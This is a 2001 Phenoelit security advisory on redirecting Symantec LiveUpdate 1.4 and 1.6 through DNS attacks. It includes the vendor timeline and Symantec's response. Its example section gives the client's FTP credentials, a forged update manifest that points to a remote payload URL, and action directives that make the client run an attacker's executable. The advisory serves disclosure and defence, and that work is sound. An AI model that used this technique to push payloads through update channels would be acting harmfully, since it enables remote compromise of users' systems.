Hi all, attached is an advisory regarding possible attacks on Symantec's LiveUpdate 1.4 and 1.6. It is also available via HTTP on http://www.phenoelit.de/stuff/LiveUpdate.txt. Regards, FX -- FX <fx@phenoelit.de> Phenoelit (http://www.phenoelit.de)
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815> [ Authors ] FX <fx@phenoelit.de> DasIch <dasich@phenoelit.de> kim0 <kim0@phenoelit.de> Phenoelit Group (http://www.phenoelit.de) [ Affected Products ] Symantec LiveUpdate 1.4 Symantec LiveUpdate 1.6 [ Vendor communication ] 09/22/2001 Symantec contacted via symsecurity@symantec.com 09/24/2001 Symsecurity acknowleges email 09/28/2001 Symsecurity response with detail statements (see "Vendor response" section) 10/01/2001 Additional statements from Symsecurity 10/03/2001 Coordination with symsecurity regarding release Communication from symsecurity stoped at this point in time. [ Overview ] LiveUpdate is a tool shipped with most Symantec products to download updates from the Symantec update servers. It is included as part of the Norton Antivirus Package and several other products in the Symantec product line. Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be used for rapid deployment of hostile code (backdoors, trojan applications, viruses, worms - if unknow to the NAV pattern file) and for remote penetration of systems running LiveUpdate via redirection of the initial connection to a server controlled by the attacker. Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus 2001 package) does not allow for this type of attack, but it can be prevented from downloading virus descriptions and product updates. It can also be used as part of distributed denial of service attacks by the same attack as described for version 1.4. [ Decription ] When LiveUpdate 1.4 is started (either by hand or as a scheduled task), it looks for the server update.symantec.com. An attacker can use one of several attacks to return false information to the querying host such as: - The attacker controls the DNS server and creates a master zone for symantec.com. - The attacker uses routing-based attacks to impersonate the DNS server. - The attacker uses DNS poisoning on the DNS server to return a false IP address. - The attacker uses layer 2 connection interception to impersonate the DNS server. - The attacker sends false DNS responses to the querying host. When the host running LiveUpdate tries to connect to update.symantec.com via FTP, it is actually connecting to the FTP server of the attackers choice. LiveUpdate will then try to receive the file livetri.zip located in the FTP server directory /opt/content/onramp. This archive contains the file LIVEUPDT.TRI which holds a complete list of all Symantec product updates. After LiveUpdate has received the file, it will compare the product versions to the versions of the Symantec products installed on the host and check the appropriate sequence numbers to see if an update is required. If an update is required, LiveUpdate will receive the file specified, uncompress it (ZIP format), and perform the actions described in the .dis file. This includes the execution of downloaded executables. The reader might see by now how an attacker can use this behavior in ways other than intended by Symantec. LiveUpdate 1.6 follows the same procedure described above with one exception. The actual downloaded update package is different. First, it's no longer a classic ZIP archive but rather some type of symantec data compression. Additionally, the file contains "cryptographic signatures" of all update files. It was not tested how strong the cryptographic implementation actually is. This signature makes it virtually impossible to use LiveUpdate 1.6 as penetration tool. However, by specifying a large file location on the Internet, a scheduled LiveUpdate session in a medium sized company will lead to network degradation and outages due to the large amount of traffic generated. An item of interesting note is that version 1.6 does not use cryptographic signatures to verify the initial list LIVEUPDT.TRI even though it places signatures on all other files. By applying the attack described above and never changing the content of the file, one can prevent any updates the victim host might require. [ Example ] An example attack was performed for LiveUpdate 1.4 by taking over a DNS server and creating a master zone for symantec.com. A false address for the FTP server update.symantec.com was then returned. This FTP server was configured to with the user 'cust-r2', which is used by LiveUpdate with the password 'Alpc2p30'. It is not known if all LiveUpdate installations use the same username and password - but it is not relevant. The file /opt/content/onramp/livetri.zip contained a modified LIVEUPDT.TRI file with the following content: [LiveUpdate] Legal=Copyright 1995-2000 (c) Symantec Corporation LastModified=20010920 05:58PM Type0=Updates Type1=Add-Ons Type2=Documentation [Mandatory0] Exclusive=FALSE ProductName=LiveUpdate Version=1.4 Language=English ItemSeqName=LiveUpdateSeq ItemSeqData=20000508 FileName=ihack.x86 Size=624807 ActionItem=noreboot.dis TypeName=Updates ItemName=LiveUpate 1.6 ItemDetails=Hacks your computer using LiveUpdate Platform=x86 AdminCompatible=FALSE URL=http://www.phenoelit.de/hackme.x86 While LiveUpdate 1.4 has a preference to use the FileName entry and try to receive the file via FTP, 1.6 has a preference for the URL given. Since this is a mandatory update for LiveUpdate itself, it will receive the file first and then try to update itself. The file ihack.x86 is actually a renamed ihack.zip file with the following content: NOREBOOT.DIS LUUPDATE.EXE LUSETUP.EXE LUUPDATE.EXE is the trojan/backdoor/whatever file the attacker wants the system to execute. NOREBOOT.DIS is a INI-like file that contains the actions LiveUpdate should perform when downloading of the file is complete. It has the following content: UPDATE (TempDir\*.EXE, LiveUpdateDir, 0) LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0) DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE) LUSETUP.exe was part of a real update package we inspected and might be left out - this was not tested. We just used the same file as LUUPDATE.exe and it worked. When the victim host triggered the update mechanism, it downloaded livetri.zip and then ihack.x86. It then executed the application LUUPDATE.exe and told the user that the update was successfully completed. Thank you. [ Vendor Response ] According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the current version and every installation should be updated to version 1.6 by now. Regarding the redirection of the LiveUpdate client, Symantec stated: "This is, unfortunately, an underlying issue with the Internet infrastructure that we are well aware of but have limited control over other than with connection points over which we exercise authority." As for the denial of service condition, the statement is: "The denial of service activity, while potentially possible under the scenerios you indicate below, would affect only a small percentage of our user base as any spoofing, redirection would be limited to a local Internet area/region." [ Solution ] The improvements Symantec introduced in LiveUpdate 1.6 and higher are actually "best practice security". It would be advisable to update all Symantec products using LiveUpdate to version 1.6. This, however does not prevent an attacker from using LiveUpdate as denial of service tool or preventing system updates. Symantec should use the same cryptographic signature method on the livetri.zip file and advise its customer base off the fact that LiveUpdate 1.4 is highly insecure. Beware! LiveUpdate 1.4 WILL NOT update itself to 1.6 as far as we are able to determine. The latest LiveUpdate 1.6.x is available from the URL http://www.symantec.com/techsupp/files/lu/lu.html According to Symantec, the next version of LiveUpdate will further enhance security. No statement about the nature of these enhancements was made. [ end of file ]